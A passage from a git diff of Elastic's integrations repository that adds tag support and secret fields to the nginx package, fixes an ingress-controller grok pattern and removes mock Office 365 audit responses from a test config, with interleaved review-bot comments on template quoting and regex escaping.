"elastic-package-service-nginx-3"] - name: event.duration range: min: 1 diff --git a/packages/nginx/changelog.yml b/packages/nginx/changelog.yml index 8f66e0b92e5..8352e20b32a 100644 --- a/packages/nginx/changelog.yml +++ b/packages/nginx/changelog.yml 
@@ -1,4 +1,24 @@ # newer versions go on top +- version: "1.20.0" + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: "1.19.1" + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: "1.19.0" + changes: + - description: Add support for tags in stub status metrics + type: enhancement + link: https://github.com/elastic/integrations/pull/9081 +- version: "1.18.0" + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: "1.17.0" changes: - description: Limit request tracer log count to five. diff --git a/packages/nginx/data_stream/stubstatus/agent/stream/stream.yml.hbs b/packages/nginx/data_stream/stubstatus/agent/stream/stream.yml.hbs index 18aabf7beea..3d50416047f 100644 --- a/packages/nginx/data_stream/stubstatus/agent/stream/stream.yml.hbs +++ b/packages/nginx/data_stream/stubstatus/agent/stream/stream.yml.hbs @@ -3,6 +3,10 @@ hosts: {{#each hosts}} - {{this}} {{/each}} +tags: +{{#each tags as |tag i|}} + - {{tag}} +{{/each}} period: {{period}} {{#if server_status_path}} server_status_path: {{server_status_path}} diff --git a/packages/nginx/data_stream/stubstatus/fields/ecs.yml b/packages/nginx/data_stream/stubstatus/fields/ecs.yml index d7ea22de8d6..83ee31e5e9a 100644 --- a/packages/nginx/data_stream/stubstatus/fields/ecs.yml +++ b/packages/nginx/data_stream/stubstatus/fields/ecs.yml @@ -7,3 +7,5 @@ dimension: true - external: ecs name: service.type +- external: ecs + name: tags 
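Review bot: The new `tags:` block in `stream.yml.hbs` is emitted unconditionally, so if a user clears the `tags` list (the manifest hunk makes it `required: false`) the rendered config contains a bare `tags:` key with no items, which YAML reads as null rather than an empty list and which the module may handle differently; wrapping the block in `{{#if tags}}` … `{{/if}}` avoids that. Each value is also interpolated unquoted as `  - {{tag}}`, so an operator-supplied tag containing YAML-significant characters (a `: `, a `#`, or a leading `[`) would alter the structure of the generated document; rendering it as `  - "{{tag}}"` is the safer form.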
diff --git a/packages/nginx/data_stream/stubstatus/manifest.yml b/packages/nginx/data_stream/stubstatus/manifest.yml
index bef7fe98c0a..1ae62ee17c1 100644
--- a/packages/nginx/data_stream/stubstatus/manifest.yml
+++ b/packages/nginx/data_stream/stubstatus/manifest.yml
@@ -17,6 +17,14 @@ streams:
 required: true
 show_user: false
 default: /nginx_status
+ - name: tags
+ type: text
+ title: Tags
+ multi: true
+ required: false
+ show_user: false
+ default:
+ - nginx-stubstatus
 title: Nginx stub status metrics
 description: Collect Nginx stub status metrics
 elasticsearch:
diff --git a/packages/nginx/data_stream/stubstatus/sample_event.json b/packages/nginx/data_stream/stubstatus/sample_event.json
index 49e012902af..ca314bad0f8 100644
--- a/packages/nginx/data_stream/stubstatus/sample_event.json
+++ b/packages/nginx/data_stream/stubstatus/sample_event.json
@@ -1,11 +1,11 @@
 {
- "@timestamp": "2022-12-09T10:41:07.200Z",
+ "@timestamp": "2024-02-08T08:12:10.668Z",
 "agent": {
- "ephemeral_id": "83392432-3db0-4ae9-98f1-342339cf935c",
- "id": "ef5e274d-4b53-45e6-943a-a5bcf1a6f523",
+ "ephemeral_id": "c3d516ba-b659-4190-a29d-d28200d74d48",
+ "id": "2ea50bee-9250-43d1-8d70-949f242aa275",
 "name": "docker-fleet-agent",
 "type": "metricbeat",
- "version": "8.5.0"
+ "version": "8.10.1"
 },
 "data_stream": {
 "dataset": "nginx.stubstatus",
@@ -13,40 +13,38 @@ "type": "metrics" }, "ecs": { - "version": "8.5.1" + "version": "8.0.0" }, "elastic_agent": { - "id": "ef5e274d-4b53-45e6-943a-a5bcf1a6f523", + "id": "2ea50bee-9250-43d1-8d70-949f242aa275", "snapshot": false, - "version": "8.5.0" + "version": "8.10.1" }, "event": { "agent_id_status": "verified", "dataset": "nginx.stubstatus", - "duration": 4340916, - "ingested": "2022-12-09T10:41:08Z", + "duration": 1156104, + "ingested": "2024-02-08T08:12:13Z", "module": "nginx" }, "host": { "architecture": "x86_64", "containerized": false, "hostname": "docker-fleet-agent", - "id": "66392b0697b84641af8006d87aeb89f1", + "id": "28da52b32df94b50aff67dfb8f1be3d6", "ip": [ - "172.18.0.7" - ], - "mac": [ - "02-42-AC-12-00-07" + "172.24.0.7" ], + "mac": "02-42-AC-18-00-07", "name": "docker-fleet-agent", "os": { "codename": "focal", "family": "debian", - "kernel": "5.15.49-linuxkit", + "kernel": "5.15.0-89-generic", "name": "Ubuntu", "platform": "ubuntu", "type": "linux", - "version": "20.04.5 LTS (Focal Fossa)" + "version": "20.04.6 LTS (Focal Fossa)" } }, "metricset": { @@ -55,14 +53,14 @@ }, "nginx": { "stubstatus": { - "accepts": 15, + "accepts": 33, "active": 1, - "current": 15, + "current": 33, "dropped": 0, - "handled": 15, + "handled": 33, "hostname": "elastic-package-service-nginx-1:80", "reading": 0, - "requests": 15, + "requests": 33, "waiting": 0, "writing": 1 } @@ -70,5 +68,8 @@ "service": { "address": "http://elastic-package-service-nginx-1:80/server-status", "type": "nginx" - } + }, + "tags": [ + "nginx-stubstatus" + ] } \ No newline at end of file diff --git a/packages/nginx/docs/README.md b/packages/nginx/docs/README.md index 9b3b3ccaf19..0ca72ca918a 100644 --- a/packages/nginx/docs/README.md +++ b/packages/nginx/docs/README.md 
@@ -439,13 +439,13 @@ An example event for `stubstatus` looks as following: ```json { - "@timestamp": "2022-12-09T10:41:07.200Z", + "@timestamp": "2024-02-08T08:12:10.668Z", "agent": { - "ephemeral_id": "83392432-3db0-4ae9-98f1-342339cf935c", - "id": "ef5e274d-4b53-45e6-943a-a5bcf1a6f523", + "ephemeral_id": "c3d516ba-b659-4190-a29d-d28200d74d48", + "id": "2ea50bee-9250-43d1-8d70-949f242aa275", "name": "docker-fleet-agent", "type": "metricbeat", - "version": "8.5.0" + "version": "8.10.1" }, "data_stream": { "dataset": "nginx.stubstatus", @@ -453,40 +453,38 @@ An example event for `stubstatus` looks as following: "type": "metrics" }, "ecs": { - "version": "8.5.1" + "version": "8.0.0" }, "elastic_agent": { - "id": "ef5e274d-4b53-45e6-943a-a5bcf1a6f523", + "id": "2ea50bee-9250-43d1-8d70-949f242aa275", "snapshot": false, - "version": "8.5.0" + "version": "8.10.1" }, "event": { "agent_id_status": "verified", "dataset": "nginx.stubstatus", - "duration": 4340916, - "ingested": "2022-12-09T10:41:08Z", + "duration": 1156104, + "ingested": "2024-02-08T08:12:13Z", "module": "nginx" }, "host": { "architecture": "x86_64", "containerized": false, "hostname": "docker-fleet-agent", - "id": "66392b0697b84641af8006d87aeb89f1", + "id": "28da52b32df94b50aff67dfb8f1be3d6", "ip": [ - "172.18.0.7" - ], - "mac": [ - "02-42-AC-12-00-07" + "172.24.0.7" ], + "mac": "02-42-AC-18-00-07", "name": "docker-fleet-agent", "os": { "codename": "focal", "family": "debian", - "kernel": "5.15.49-linuxkit", + "kernel": "5.15.0-89-generic", "name": "Ubuntu", "platform": "ubuntu", "type": "linux", - "version": "20.04.5 LTS (Focal Fossa)" + "version": "20.04.6 LTS (Focal Fossa)" } }, "metricset": { 
@@ -495,14 +493,14 @@ An example event for `stubstatus` looks as following: }, "nginx": { "stubstatus": { - "accepts": 15, + "accepts": 33, "active": 1, - "current": 15, + "current": 33, "dropped": 0, - "handled": 15, + "handled": 33, "hostname": "elastic-package-service-nginx-1:80", "reading": 0, - "requests": 15, + "requests": 33, "waiting": 0, "writing": 1 } @@ -510,7 +508,10 @@ An example event for `stubstatus` looks as following: "service": { "address": "http://elastic-package-service-nginx-1:80/server-status", "type": "nginx" - } + }, + "tags": [ + "nginx-stubstatus" + ] } ``` @@ -568,6 +569,7 @@ An example event for `stubstatus` looks as following: | nginx.stubstatus.writing | The current number of connections where Nginx is writing the response back to the client. | long | gauge | | service.address | Address where data about this service was collected from. This should be a URI, network address (ipv4:port or [ipv6]:port) or a resource path (sockets). | keyword | | | service.type | The type of the service data is collected from. The type can be used to group and correlate logs and metrics from one service type. Example: If logs or metrics are collected from Elasticsearch, `service.type` would be `elasticsearch`. | keyword | | +| tags | List of keywords used to tag each event. | keyword | | ## ML Modules diff --git a/packages/nginx/manifest.yml b/packages/nginx/manifest.yml index ddc6cd142ab..4935ef5e13f 100644 --- a/packages/nginx/manifest.yml +++ b/packages/nginx/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: nginx title: Nginx -version: "1.17.0" +version: "1.20.0" description: Collect logs and metrics from Nginx HTTP servers with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - observability conditions: kibana: - version: "^8.8.0" + version: "^8.12.0" elastic: subscription: basic screenshots: 
@@ -65,10 +65,12 @@ policy_templates: type: password title: Splunk REST API Password show_user: true + secret: true required: false - name: token type: password title: Splunk Authorization Token + secret: true description: | Bearer Token or Session Key, e.g. "Bearer eyJFd3e46..." or "Splunk 192fd3e...". Cannot be used with username diff --git a/packages/nginx_ingress_controller/changelog.yml b/packages/nginx_ingress_controller/changelog.yml index df39c7665bd..9c8731bc161 100644 --- a/packages/nginx_ingress_controller/changelog.yml +++ b/packages/nginx_ingress_controller/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.8.3" + changes: + - description: Fix ingest pipeline warnings + type: bugfix + link: https://github.com/elastic/integrations/pulls/9574 - version: "1.8.2" changes: - description: Migrate Access and error logs dashboard visualizations to lens. diff --git a/packages/nginx_ingress_controller/data_stream/error/elasticsearch/ingest_pipeline/default.yml b/packages/nginx_ingress_controller/data_stream/error/elasticsearch/ingest_pipeline/default.yml index 48af0f4ae68..8ceedce01fb 100644 --- a/packages/nginx_ingress_controller/data_stream/error/elasticsearch/ingest_pipeline/default.yml +++ b/packages/nginx_ingress_controller/data_stream/error/elasticsearch/ingest_pipeline/default.yml 
@@ -12,7 +12,7 @@ processors: - grok: field: event.original patterns: - - '%{LOG_LEVEL:log.level}%{MONTHNUM2:timestamp_month}%{MONTHDAY:timestamp_day} %{HOUR:timestamp_hour}:%{MINUTE:timestamp_minute}:%{SECOND:timestamp_second}.%{NANOS:timestamp_nano}%{SPACE}%{NUMBER:nginx_ingress_controller.error.thread_id} %{SOURCE_FILE:nginx_ingress_controller.error.source.file}:%{NUMBER:nginx_ingress_controller.error.source.line_number}] %{GREEDYMULTILINE:message}' + - '%{LOG_LEVEL:log.level}%{MONTHNUM2:timestamp_month}%{MONTHDAY:timestamp_day} %{HOUR:timestamp_hour}:%{MINUTE:timestamp_minute}:%{SECOND:timestamp_second}.%{NANOS:timestamp_nano}%{SPACE}%{NUMBER:nginx_ingress_controller.error.thread_id} %{SOURCE_FILE:nginx_ingress_controller.error.source.file}:%{NUMBER:nginx_ingress_controller.error.source.line_number}\] %{GREEDYMULTILINE:message}' pattern_definitions: LOG_LEVEL: '[A-Z]{1}' NANOS: '[0-9]{6}' diff --git a/packages/nginx_ingress_controller/manifest.yml b/packages/nginx_ingress_controller/manifest.yml index 9afb516dc6e..f0ac35a6a30 100644 --- a/packages/nginx_ingress_controller/manifest.yml +++ b/packages/nginx_ingress_controller/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: nginx_ingress_controller title: Nginx Ingress Controller Logs -version: 1.8.2 +version: 1.8.3 license: basic description: Collect Nginx Ingress Controller logs. type: integration diff --git a/packages/o365/_dev/deploy/docker/config.yml b/packages/o365/_dev/deploy/docker/config.yml index dc6c52dafdf..f5d62944070 100644 --- a/packages/o365/_dev/deploy/docker/config.yml +++ b/packages/o365/_dev/deploy/docker/config.yml 
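Review bot: The rewritten grok pattern now escapes the closing bracket as `\]`, but the `.` separating `%{SECOND:timestamp_second}` from `%{NANOS:timestamp_nano}` is still an unescaped regex metacharacter, so it matches any single character rather than a literal dot; `\.%{NANOS:timestamp_nano}` would make that part as strict as the rest of the line. This is pre-existing, but since the line is already being touched for the warning fix it is the natural moment to tighten it.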
@@ -18,227 +18,6 @@ rules:
 - "application/json"
 body: |-
 {"access_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ilg1ZVhrN","token_type": "Bearer","not_before": 1549647431,"expires_in": 3600,"resource": "f2a76e08-93f2-4350-833c-965c02483b11"}
- - path: /api/v1.0/tenant-id/activity/feed/subscriptions/content
- methods: [GET]
- query_params:
- contentType: "Audit.AzureActiveDirectory"
- startTime: "{startTime:.*}"
- endTime: "{endTime:.*}"
- publisherIdentifier: tenant-id
- request_headers:
- Authorization:
- - "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ilg1ZVhrN"
- responses:
- - status_code: 200
- headers:
- Content-Type:
- - "application/json"
- body: |-
- [
- {
- "contentType": "Audit.AzureActiveDirectory",
- "contentId": "id1",
- "contentUri": "http://{{ hostname }}:{{ env "PORT" }}/api/v1.0/aad1/activity/feed/audit/id1",
- "contentCreated": "{{ .request.vars.endTime }}Z",
- "contentExpiration": "2199-05-30T17:35:00.000Z"
- }
- ]
- - path: /api/v1.0/aad1/activity/feed/audit/id1
- methods: [GET]
- query_params:
- publisherIdentifier: tenant-id
- request_headers:
- Authorization:
- - "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ilg1ZVhrN"
- responses:
- - status_code: 200
- headers:
- Content-Type:
- - "application/json"
- body: |-
- [
- {"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:33:26", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": 
"AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "NewValue": "[\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n 
}\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "528b5206-f6de-4c1f-86db-5f750a9960c9"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:33:26.1037807Z"}, {"Name": "env_epoch", "Value": "31CXC"}, {"Name": "env_seqNum", "Value": "38438635"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": 
"env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR556"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "8f6eb24b-6e61-4ee2-a376-31368c300613"}, - {"InterSystemsId": "03616b3a-fc75-46a1-b34a-2d82fc8f1e7e", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:13", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "c4206c29-46c2-4a6f-a46b-735107705400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", 
"Id": "ca0efc24-1b89-4962-8fef-a3ac5437302f"} - ] - - path: /api/v1.0/tenant-id/activity/feed/subscriptions/content - methods: [GET] - query_params: - contentType: "Audit.Exchange" - startTime: "{startTime:.*}" - endTime: "{endTime:.*}" - publisherIdentifier: tenant-id - request_headers: - Authorization: - - "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ilg1ZVhrN" - responses: - - status_code: 200 - headers: - Content-Type: - - "application/json" - body: |- - [ - { - "contentType": "Audit.Exchange", - "contentId": "id1", - "contentUri": "http://{{ hostname }}:{{ env "PORT" }}/api/v1.0/exch1/activity/feed/audit/id1", - "contentCreated": "{{ .request.vars.endTime }}Z", - "contentExpiration": "2199-05-30T17:35:00.000Z" - } - ] - - path: /api/v1.0/exch1/activity/feed/audit/id1 - methods: [GET] - query_params: - publisherIdentifier: tenant-id - request_headers: - Authorization: - - "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ilg1ZVhrN" - responses: - - status_code: 200 - headers: - Content-Type: - - "application/json" - body: |- - [ - {"OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", "ClientAppId": "", "OrganizationName": "testsiem.onmicrosoft.com", "RecordType": 1, "ObjectId": "testsiem.onmicrosoft.com\\Transport Settings", "Workload": "Exchange", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "UserId": "NT AUTHORITY\\SYSTEM (Microsoft.Exchange.ServiceHost)", "CreationTime": "2020-02-10T07:37:13", "Parameters": [{"Name": "DomainController", "Value": ""}, {"Name": "Identity", "Value": "testsiem.onmicrosoft.com"}, {"Name": "OrganizationFederatedMailbox", "Value": "FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com"}], "UserType": 3, "Version": 1, "ResultStatus": "True", "AppId": "", "ExternalAccess": true, "UserKey": "NT AUTHORITY\\SYSTEM (Microsoft.Exchange.ServiceHost)", "Operation": "Set-TransportConfig", "Id": "ea769bfc-fa67-465c-767a-08d7adfc0b7b"}, - 
{"OrganizationName":"testsiem.onmicrosoft.com","UserKey":"S-1-5-18","MailboxGuid":"26286ffa-073d-45ff-9fe9-539891984d69","Operation":"ModifyFolderPermissions","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","ClientIPAddress":"::1","Item":{"Id":"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC","ParentFolder":{"Path":"\\Calendar","MemberRights":"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed","MemberSid":"S-1-8-640184314-1174341437-2555636127-1766693009-0","Id":"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC","MemberUpn":"Owner@local","Name":"Calendar"}},"AdditionalInfo":{"EnvironmentName":"Default-ae81357b-84e6-4e54-b02c-db7dddd1e869"},"AppAccessContext":{"ClientAppId":"89118fb4-83bf-46d9-bb84-78cca4c122d5"},"LogonUserSid":"S-1-5-18","OriginatingServer":"AM6PR01MB4535 (15.20.229.32)\n","RecordType":2,"Version":1,"ClientInfoString":"Client=WebServices;Action=ConfigureGroupMailbox","MailboxOwnerUPN":"SIEMTest@testsiem.onmicrosoft.com","MailboxOwnerMasterAccountSid":"S-1-5-10","MailboxOwnerSid":"S-1-5-21-3422892061-1135328251-2670905592-26680073","ResultStatus":"Succeeded","ExternalAccess":true,"LogonType":1,"ClientIP":"::1","Workload":"Exchange","InternalLogonType":1,"UserId":"S-1-5-18","CreationTime":"2020-02-17T17:12:03","Id":"284dfe85-ab53-48ad-0863-08d7b3cc81f7","UserType":2} - ] - - path: /api/v1.0/tenant-id/activity/feed/subscriptions/content - methods: [GET] - query_params: - contentType: "Audit.SharePoint" - startTime: "{startTime:.*}" - endTime: "{endTime:.*}" - publisherIdentifier: tenant-id - request_headers: - Authorization: - - "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ilg1ZVhrN" - responses: - - status_code: 200 - headers: - Content-Type: - - "application/json" - body: |- - [ - { - "contentType": "Audit.Sharepoint", - "contentId": "id1", - "contentUri": "http://{{ hostname }}:{{ env "PORT" }}/api/v1.0/sp1/activity/feed/audit/id1", - 
"contentCreated": "{{ .request.vars.endTime }}Z", - "contentExpiration": "2199-05-30T17:35:00.000Z" - } - ] - - path: /api/v1.0/sp1/activity/feed/audit/id1 - methods: [GET] - query_params: - publisherIdentifier: tenant-id - request_headers: - Authorization: - - "Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ilg1ZVhrN" - responses: - - status_code: 200 - headers: - Content-Type: - - "application/json" - body: |- - [ - {"ListItemUniqueId": "59a8433d-9bb8-cfef-6edc-4c0fc8b86875", "ItemType": "Page", "Workload": "OneDrive", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "UserId": "asr@testsiem.onmicrosoft.com", "CreationTime": "2020-02-07T16:43:53", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "ClientIP": "213.97.47.133", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "UserType": 0, "Version": 1, "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "CustomUniqueId": true, "Operation": "PageViewed", "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx", "Id": "99d005e6-a4c6-46fd-117c-08d7abeceab5", "CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25", "RecordType": 4}, - {"UserId": "asr@testsiem.onmicrosoft.com", "ListItemUniqueId": "59a8433d-9bb8-cfef-6edc-4c0fc8b86875", "RecordType": 4, "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx", "Workload": "OneDrive", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "UserType": 0, "CreationTime": "2020-02-07T16:43:53", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "ClientIP": "213.97.47.133", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "Version": 1, "EventSource": "SharePoint", "CustomUniqueId": true, "UserKey": 
"i:0h.f|membership|1003200096971f55@live.com", "Operation": "PageViewed", "Id": "99d005e6-a4c6-46fd-117c-08d7abeceab5", "CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25", "ItemType": "Page"}, - {"Workload": "OneDrive", "Version": 1, "RecordType": 4, "ObjectId": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "UserId": "asr@testsiem.onmicrosoft.com", "CreationTime": "2020-02-07T16:43:53", "Site": "d5180cfc-3479-44d6-b410-8c985ac894e3", "Id": "99d005e6-a4c6-46fd-117c-08d7abeceab5", "WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30", "UserType": 0, "ListItemUniqueId": "59a8433d-9bb8-cfef-6edc-4c0fc8b86875", "EventSource": "SharePoint", "UserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "UserKey": "i:0h.f|membership|1003200096971f55@live.com", "CustomUniqueId": true, "ClientIP": "213.97.47.133", "Operation": "PageViewed", "CorrelationId": "622b339f-4000-a000-f25f-92b3478c7a25", "ItemType": "Page"}, - {"SiteUrl": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:23", "ListId": 